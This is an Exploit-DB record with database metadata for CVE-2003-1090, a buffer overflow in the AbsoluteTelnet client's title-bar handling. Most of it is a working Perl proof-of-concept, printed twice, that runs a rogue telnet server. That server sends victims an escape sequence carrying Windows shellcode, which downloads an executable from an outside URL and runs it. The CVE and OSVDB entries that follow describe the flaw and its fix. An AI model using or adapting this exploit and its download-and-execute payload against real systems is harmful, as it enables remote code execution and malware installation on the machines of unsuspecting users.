Celestial Software AbsoluteTelnet 2.0/2.11 Title Bar Buffer Overflow Vulnerability
2003-02-06T00:00:00
ID EDB-ID:22229 Type exploitdb Reporter Knud Erik Hojgaard Modified 2003-02-06T00:00:00
Description
Celestial Software AbsoluteTelnet 2.0/2.11 Title Bar Buffer Overflow Vulnerability. CVE-2003-1090. Remote exploit for windows platform
source: http://www.securityfocus.com/bid/6785/info
A buffer overflow vulnerability was reported for AbsoluteTelnet. The vulnerability exists due to insufficient bounds checking performed when setting the title bar of the client.
An attacker can exploit this vulnerability by enticing a victim user to view a website with malicious HTML tags. This will cause the buffer overflow condition. Code execution may be possible.
#!/usr/bin/perl
#UK2-SEC presents..
#absolute telnet 2.00 buffer overflow
#proof of concept code
#based on kain@ircop.dk advisory
#thanx knud..
#
#Coded by:
#deadbeat
#eip@oakey.no-ip.com
#
#UK2-SEC...
use IO::Socket;
$user = "new";
$pass = "iamnew";
$shellcode =
"\xF0\x00\x00\x00\x58\x55\x89\xE5\x81\xEC\x2C\x00\x00\x00\x89\x45\xD4\xC7\x45\xFC".
"\x00\x00\xE6\x77\x8B\x45\xFC\x66\x81\x38\x4D\x5A\x75\x7C\x05\x3C\x00\x00\x00\x8B".
"\x18\x03\x5D\xFC\x66\x81\x3B\x50\x45\x75\x6B\x81\xC3\x78\x00\x00\x00\x8B\x33\x03".
"\x75\xFC\x81\xC6\x18\x00\x00\x00\xAD\x89\x45\xF4\xAD\x03\x45\xFC\x89\x45\xF0\xAD".
"\x03\x45\xFC\x89\x45\xEC\xAD\x03\x45\xFC\x89\x45\xE8\x31\xFF\x8B\x45\xD4\x05\x0F".
"\x00\x00\x00\x89\x45\xDC\xC7\x45\xD8\x0D\x00\x00\x00\xE8\x2D\x00\x00\x00\x8B\x55".
"\xDC\x89\x55\xE0\x8B\x45\xD4\x89\x45\xDC\xC7\x45\xD8\x0F\x00\x00\x00\xE8\x15\x00".
"\x00\x00\x8B\x55\xDC\x89\x55\xE4\x8B\x45\xE0\x89\xD3\xE9\x77\x00\x00\x00\xE9\xF6".
"\x00\x00\x00\x31\xC0\x89\x45\xF8\x8B\x7D\xF8\x3B\x7D\xF4\x7D\x43\x47\x89\x7D\xF8".
"\x31\xC0\x8B\x45\xF8\xC1\xE0\x02\x8B\x5D\xEC\x01\xC3\x8B\x03\x03\x45\xFC\x89\xC7".
"\x8B\x75\xDC\x8B\x4D\xD8\xF3\xA6\x75\xD6\x31\xC0\x8B\x45\xF8\xD1\xE0\x8B\x5D\xE8".
"\x01\xC3\x31\xC0\x66\x8B\x03\xC1\xE0\x02\x8B\x5D\xF0\x01\xD8\x8B\x18\x03\x5D\xFC".
"\x89\x5D\xDC\xC3\xE8\x0B\xFF\xFF\xFF\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72".
"\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\xE9\x82\x00".
"\x00\x00\x5F\x55\x89\xE5\x81\xEC\x1C\x00\x00\x00\x89\x45\xE8\x89\x5D\xE4\x89\x7D".
"\xFC\xC7\x45\xEC\x06\x00\x00\x00\x8B\x45\xFC\x89\x45\xF4\x05\x46\x00\x00\x00\x89".
"\x45\xF0\xE8\x27\x00\x00\x00\xC7\x45\xEC\x03\x00\x00\x00\x8B\x45\xFC\x05\x4C\x00".
"\x00\x00\x89\x45\xF4\x05\x3C\x00\x00\x00\x89\x45\xF0\xE8\x08\x00\x00\x00\x8B\x45".
"\xFC\xE9\xCB\x00\x00\x00\x8B\x45\xF4\x50\xFF\x55\xE8\x85\xC0\x74\x20\x89\x45\xF8".
"\x8B\x75\xF0\x8B\x4D\xEC\x8B\x5D\xF4\x31\xC0\xAC\x01\xC3\x8B\x45\xF8\x60\x53\x50".
"\xFF\x55\xE4\x89\x03\x61\xE2\xEA\xC3\x90\xEB\xFD\xE8\x79\xFF\xFF\xFF\x6B\x65\x72".
"\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x00\x56\x69\x72\x74\x75\x61\x6C\x41\x6C\x6C".
"\x6F\x63\x00\x5F\x6C\x63\x72\x65\x61\x74\x00\x5F\x6C\x77\x72\x69\x74\x65\x00\x5F".
"\x6C\x63\x6C\x6F\x73\x65\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x45\x78\x69\x74\x50".
"\x72\x6F\x63\x65\x73\x73\x00\x0D\x1A\x22\x2A\x32\x3A\x77\x69\x6E\x69\x6E\x65\x74".
"\x2E\x64\x6C\x6C\x00\x49\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x00\x49".
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x00\x49\x6E\x74\x65".
"\x72\x6E\x65\x74\x52\x65\x61\x64\x46\x69\x6C\x65\x00\x0C\x1A\x2B\x90\x31\xC0\x50".
"\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x3A\xE9\xE9\x00\x00\x00\x5E\x89\x86\x6A\x00\x00".
"\x00\x68\x04\x00\x00\x00\x68\x00\x10\x00\x00\x68\x9F\x86\x01\x00\x68\x00\x00\x00".
"\x00\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x0D\x89\x86\x00\x00\x00\x00\x31\xC0\x50\x50".
"\x50\x50\x50\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x58\x89\x86\x04\x00\x00\x00\x31\xC0".
"\x50\x50\x50\x50\x8D\x86\x08\x00\x00\x00\x50\x8B\x86\x04\x00\x00\x00\x50\x8B\x8E".
"\x6A\x00\x00\x00\xFF\x51\x66\x89\x86\x04\x00\x00\x00\x8D\x86\x62\x00\x00\x00\x50".
"\x68\x9F\x86\x01\x00\x8B\x86\x00\x00\x00\x00\x50\x8B\x86\x04\x00\x00\x00\x50\x8B".
"\x8E\x6A\x00\x00\x00\xFF\x51\x77\x68\x00\x00\x00\x00\x8D\x86\x58\x00\x00\x00\x50".
"\x8B\x8E\x6A\x00\x00\x00\xFF\x51\x1A\x89\x86\x66\x00\x00\x00\x8B\x86\x62\x00\x00".
"\x00\x50\x8B\x86\x00\x00\x00\x00\x50\x8B\x86\x66\x00\x00\x00\x50\x8B\x8E\x6A\x00".
"\x00\x00\xFF\x51\x22\x8B\x86\x66\x00\x00\x00\x50\x8B\x8E\x6A\x00\x00\x00\xFF\x51".
"\x2A\x68\x05\x00\x00\x00\x8D\x86\x58\x00\x00\x00\x50\x8B\x8E\x6A\x00\x00\x00\xFF".
"\x51\x32\xE9\x06\xFF\xFF\xFF\xE8\x12\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00".
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x65\x6C\x69\x6B\x6F\x6E\x2E\x64".
"\x65\x2F\x6B\x6C\x65\x69\x6E\x2E\x65\x78\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x6B\x6C\x65\x69\x6E\x2E\x65\x78\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x90";
$shell_len = length($shellcode);
print "Length of shellcode is: $shell_len\n";
$buf = "\x00" x 261;
$buf .= $shellcode;
print "\nUK2-SEC presents..\n";
print "absolutetelnet 2.00 buffer overflow\n";
print "Should start POC on port:1331\n";
$server =IO::Socket::INET->new
(
LocalPort => 1331,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 5
) or die "Couldn't open POC server...\n";
while ($client = $server->accept()) {
print $client "Welcome to localhost.localdomain\n";
print $client "login using the password:iamnew\n";
sleep 2;
print $client "\n\nPassword: ";
$passcheck = <$client>;
unless($passcheck = $pass){
print $client "\n\nWrong password..\n";
close $server;
}
print $client"\n\nUser verfied..\n";
print $client "\033]0$buf\007";
}
close $server;
{"id": "EDB-ID:22229", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Celestial Software AbsoluteTelnet 2.0/2.11 Title Bar Buffer Overflow Vulnerability", "description": "Celestial Software AbsoluteTelnet 2.0/2.11 Title Bar Buffer Overflow Vulnerability. CVE-2003-1090. Remote exploit for windows platform", "published": "2003-02-06T00:00:00", "modified": "2003-02-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/22229/", "reporter": "Knud Erik Hojgaard", "references": [], "cvelist": ["CVE-2003-1090"], "lastseen": "2016-02-02T18:16:16", "viewCount": 2, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-02T18:16:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1090"]}, {"type": "osvdb", "idList": ["OSVDB:16024"]}], "modified": "2016-02-02T18:16:16", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/22229/", "sourceData": "source: http://www.securityfocus.com/bid/6785/info\r\n\r\nA buffer overflow vulnerability was reported for AbsoluteTelnet. The vulnerability exists due to insufficient bounds checking performed when setting the title bar of the client. \r\n\r\nAn attacker can exploit this vulnerability by enticing a victim user to view a website with malicious HTML tags. This will cause the buffer overflow condition. Code execution may be possible.\r\n\r\n#!/usr/bin/perl\r\n#UK2-SEC presents..\r\n#absolute telnet 2.00 buffer overflow\r\n#proof of concept code\r\n#based on kain@ircop.dk advisory\r\n#thanx knud..\r\n#\r\n#Coded by:\r\n#deadbeat\r\n#eip@oakey.no-ip.com\r\n#\r\n#UK2-SEC...\r\nuse IO::Socket;\r\n$user = \"new\";\r\n$pass = \"iamnew\";\r\n$shellcode = \r\n\"\\xF0\\x00\\x00\\x00\\x58\\x55\\x89\\xE5\\x81\\xEC\\x2C\\x00\\x00\\x00\\x89\\x45\\xD4\\xC7\\x45\\xFC\".\r\n\"\\x00\\x00\\xE6\\x77\\x8B\\x45\\xFC\\x66\\x81\\x38\\x4D\\x5A\\x75\\x7C\\x05\\x3C\\x00\\x00\\x00\\x8B\".\r\n\"\\x18\\x03\\x5D\\xFC\\x66\\x81\\x3B\\x50\\x45\\x75\\x6B\\x81\\xC3\\x78\\x00\\x00\\x00\\x8B\\x33\\x03\".\r\n\"\\x75\\xFC\\x81\\xC6\\x18\\x00\\x00\\x00\\xAD\\x89\\x45\\xF4\\xAD\\x03\\x45\\xFC\\x89\\x45\\xF0\\xAD\".\r\n\"\\x03\\x45\\xFC\\x89\\x45\\xEC\\xAD\\x03\\x45\\xFC\\x89\\x45\\xE8\\x31\\xFF\\x8B\\x45\\xD4\\x05\\x0F\".\r\n\"\\x00\\x00\\x00\\x89\\x45\\xDC\\xC7\\x45\\xD8\\x0D\\x00\\x00\\x00\\xE8\\x2D\\x00\\x00\\x00\\x8B\\x55\".\r\n\"\\xDC\\x89\\x55\\xE0\\x8B\\x45\\xD4\\x89\\x45\\xDC\\xC7\\x45\\xD8\\x0F\\x00\\x00\\x00\\xE8\\x15\\x00\".\r\n\"\\x00\\x00\\x8B\\x55\\xDC\\x89\\x55\\xE4\\x8B\\x45\\xE0\\x89\\xD3\\xE9\\x77\\x00\\x00\\x00\\xE9\\xF6\".\r\n\"\\x00\\x00\\x00\\x31\\xC0\\x89\\x45\\xF8\\x8B\\x7D\\xF8\\x3B\\x7D\\xF4\\x7D\\x43\\x47\\x89\\x7D\\xF8\".\r\n\"\\x31\\xC0\\x8B\\x45\\xF8\\xC1\\xE0\\x02\\x8B\\x5D\\xEC\\x01\\xC3\\x8B\\x03\\x03\\x45\\xFC\\x89\\xC7\".\r\n\"\\x8B\\x75\\xDC\\x8B\\x4D\\xD8\\xF3\\xA6\\x75\\xD6\\x31\\xC0\\x8B\\x45\\xF8\\xD1\\xE0\\x8B\\x5D\\xE8\".\r\n\"\\x01\\xC3\\x31\\xC0\\x66\\x8B\\x03\\xC1\\xE0\\x02\\x8B\\x5D\\xF0\\x01\\xD8\\x8B\\x18\\x03\\x5D\\xFC\".\r\n\"\\x89\\x5D\\xDC\\xC3\\xE8\\x0B\\xFF\\xFF\\xFF\\x47\\x65\\x74\\x50\\x72\\x6F\\x63\\x41\\x64\\x64\\x72\".\r\n\"\\x65\\x73\\x73\\x00\\x4C\\x6F\\x61\\x64\\x4C\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x00\\xE9\\x82\\x00\".\r\n\"\\x00\\x00\\x5F\\x55\\x89\\xE5\\x81\\xEC\\x1C\\x00\\x00\\x00\\x89\\x45\\xE8\\x89\\x5D\\xE4\\x89\\x7D\".\r\n\"\\xFC\\xC7\\x45\\xEC\\x06\\x00\\x00\\x00\\x8B\\x45\\xFC\\x89\\x45\\xF4\\x05\\x46\\x00\\x00\\x00\\x89\".\r\n\"\\x45\\xF0\\xE8\\x27\\x00\\x00\\x00\\xC7\\x45\\xEC\\x03\\x00\\x00\\x00\\x8B\\x45\\xFC\\x05\\x4C\\x00\".\r\n\"\\x00\\x00\\x89\\x45\\xF4\\x05\\x3C\\x00\\x00\\x00\\x89\\x45\\xF0\\xE8\\x08\\x00\\x00\\x00\\x8B\\x45\".\r\n\"\\xFC\\xE9\\xCB\\x00\\x00\\x00\\x8B\\x45\\xF4\\x50\\xFF\\x55\\xE8\\x85\\xC0\\x74\\x20\\x89\\x45\\xF8\".\r\n\"\\x8B\\x75\\xF0\\x8B\\x4D\\xEC\\x8B\\x5D\\xF4\\x31\\xC0\\xAC\\x01\\xC3\\x8B\\x45\\xF8\\x60\\x53\\x50\".\r\n\"\\xFF\\x55\\xE4\\x89\\x03\\x61\\xE2\\xEA\\xC3\\x90\\xEB\\xFD\\xE8\\x79\\xFF\\xFF\\xFF\\x6B\\x65\\x72\".\r\n\"\\x6E\\x65\\x6C\\x33\\x32\\x2E\\x64\\x6C\\x6C\\x00\\x56\\x69\\x72\\x74\\x75\\x61\\x6C\\x41\\x6C\\x6C\".\r\n\"\\x6F\\x63\\x00\\x5F\\x6C\\x63\\x72\\x65\\x61\\x74\\x00\\x5F\\x6C\\x77\\x72\\x69\\x74\\x65\\x00\\x5F\".\r\n\"\\x6C\\x63\\x6C\\x6F\\x73\\x65\\x00\\x57\\x69\\x6E\\x45\\x78\\x65\\x63\\x00\\x45\\x78\\x69\\x74\\x50\".\r\n\"\\x72\\x6F\\x63\\x65\\x73\\x73\\x00\\x0D\\x1A\\x22\\x2A\\x32\\x3A\\x77\\x69\\x6E\\x69\\x6E\\x65\\x74\".\r\n\"\\x2E\\x64\\x6C\\x6C\\x00\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x4F\\x70\\x65\\x6E\\x41\\x00\\x49\".\r\n\"\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x4F\\x70\\x65\\x6E\\x55\\x72\\x6C\\x41\\x00\\x49\\x6E\\x74\\x65\".\r\n\"\\x72\\x6E\\x65\\x74\\x52\\x65\\x61\\x64\\x46\\x69\\x6C\\x65\\x00\\x0C\\x1A\\x2B\\x90\\x31\\xC0\\x50\".\r\n\"\\x8B\\x8E\\x6A\\x00\\x00\\x00\\xFF\\x51\\x3A\\xE9\\xE9\\x00\\x00\\x00\\x5E\\x89\\x86\\x6A\\x00\\x00\".\r\n\"\\x00\\x68\\x04\\x00\\x00\\x00\\x68\\x00\\x10\\x00\\x00\\x68\\x9F\\x86\\x01\\x00\\x68\\x00\\x00\\x00\".\r\n\"\\x00\\x8B\\x8E\\x6A\\x00\\x00\\x00\\xFF\\x51\\x0D\\x89\\x86\\x00\\x00\\x00\\x00\\x31\\xC0\\x50\\x50\".\r\n\"\\x50\\x50\\x50\\x8B\\x8E\\x6A\\x00\\x00\\x00\\xFF\\x51\\x58\\x89\\x86\\x04\\x00\\x00\\x00\\x31\\xC0\".\r\n\"\\x50\\x50\\x50\\x50\\x8D\\x86\\x08\\x00\\x00\\x00\\x50\\x8B\\x86\\x04\\x00\\x00\\x00\\x50\\x8B\\x8E\".\r\n\"\\x6A\\x00\\x00\\x00\\xFF\\x51\\x66\\x89\\x86\\x04\\x00\\x00\\x00\\x8D\\x86\\x62\\x00\\x00\\x00\\x50\".\r\n\"\\x68\\x9F\\x86\\x01\\x00\\x8B\\x86\\x00\\x00\\x00\\x00\\x50\\x8B\\x86\\x04\\x00\\x00\\x00\\x50\\x8B\".\r\n\"\\x8E\\x6A\\x00\\x00\\x00\\xFF\\x51\\x77\\x68\\x00\\x00\\x00\\x00\\x8D\\x86\\x58\\x00\\x00\\x00\\x50\".\r\n\"\\x8B\\x8E\\x6A\\x00\\x00\\x00\\xFF\\x51\\x1A\\x89\\x86\\x66\\x00\\x00\\x00\\x8B\\x86\\x62\\x00\\x00\".\r\n\"\\x00\\x50\\x8B\\x86\\x00\\x00\\x00\\x00\\x50\\x8B\\x86\\x66\\x00\\x00\\x00\\x50\\x8B\\x8E\\x6A\\x00\".\r\n\"\\x00\\x00\\xFF\\x51\\x22\\x8B\\x86\\x66\\x00\\x00\\x00\\x50\\x8B\\x8E\\x6A\\x00\\x00\\x00\\xFF\\x51\".\r\n\"\\x2A\\x68\\x05\\x00\\x00\\x00\\x8D\\x86\\x58\\x00\\x00\\x00\\x50\\x8B\\x8E\\x6A\\x00\\x00\\x00\\xFF\".\r\n\"\\x51\\x32\\xE9\\x06\\xFF\\xFF\\xFF\\xE8\\x12\\xFF\\xFF\\xFF\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x64\\x65\\x6C\\x69\\x6B\\x6F\\x6E\\x2E\\x64\".\r\n\"\\x65\\x2F\\x6B\\x6C\\x65\\x69\\x6E\\x2E\\x65\\x78\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x6B\\x6C\\x65\\x69\\x6E\\x2E\\x65\\x78\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\r\n\"\\x00\\x00\\x90\";\r\n$shell_len = length($shellcode);\r\nprint \"Length of shellcode is: $shell_len\\n\";\r\n$buf = \"\\x00\" x 261;\r\n$buf .= $shellcode;\r\nprint \"\\nUK2-SEC presents..\\n\";\r\nprint \"absolutetelnet 2.00 buffer overflow\\n\";\r\nprint \"Should start POC on port:1331\\n\";\r\n$server =IO::Socket::INET->new\r\n(\r\n LocalPort => 1331,\r\n Type => SOCK_STREAM,\r\n Reuse => 1,\r\n Listen => 5\r\n) or die \"Couldn't open POC server...\\n\";\r\nwhile ($client = $server->accept()) {\r\n print $client \"Welcome to localhost.localdomain\\n\";\r\n print $client \"login using the password:iamnew\\n\";\r\n sleep 2;\r\n print $client \"\\n\\nPassword: \";\r\n $passcheck = <$client>;\r\n unless($passcheck = $pass){\r\n print $client \"\\n\\nWrong password..\\n\";\r\n close $server;\r\n }\r\n print $client\"\\n\\nUser verfied..\\n\";\r\n print $client \"\\033]0$buf\\007\";\r\n}\r\nclose $server;", "osvdbidlist": ["16024"]}
{"cve": [{"lastseen": "2020-10-03T11:33:03", "description": "Buffer overflow in AbsoluteTelnet before 2.12 RC10 allows remote attackers to execute arbitrary code via a long window title.", "edition": 3, "cvss3": {}, "published": "2003-02-06T05:00:00", "title": "CVE-2003-1090", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-1090"], "modified": "2017-07-11T01:29:00", "cpe": ["cpe:/a:celestial_software:absolutetelnet:2.0", "cpe:/a:celestial_software:absolutetelnet:2.11"], "id": "CVE-2003-1090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1090", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:celestial_software:absolutetelnet:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:celestial_software:absolutetelnet:2.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2003-1090"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in AbsoluteTelnet. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long window title, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in AbsoluteTelnet. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long window title, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.celestialsoftware.net/telnet/index.html\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104454984001076&w=2\nISS X-Force ID: 11265\n[CVE-2003-1090](https://vulners.com/cve/CVE-2003-1090)\nCERT VU: 666073\nBugtraq ID: 6785\n", "modified": "2003-02-06T23:35:52", "published": "2003-02-06T23:35:52", "href": "https://vulners.com/osvdb/OSVDB:16024", "id": "OSVDB:16024", "type": "osvdb", "title": "AbsoluteTelnet Windows Title Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
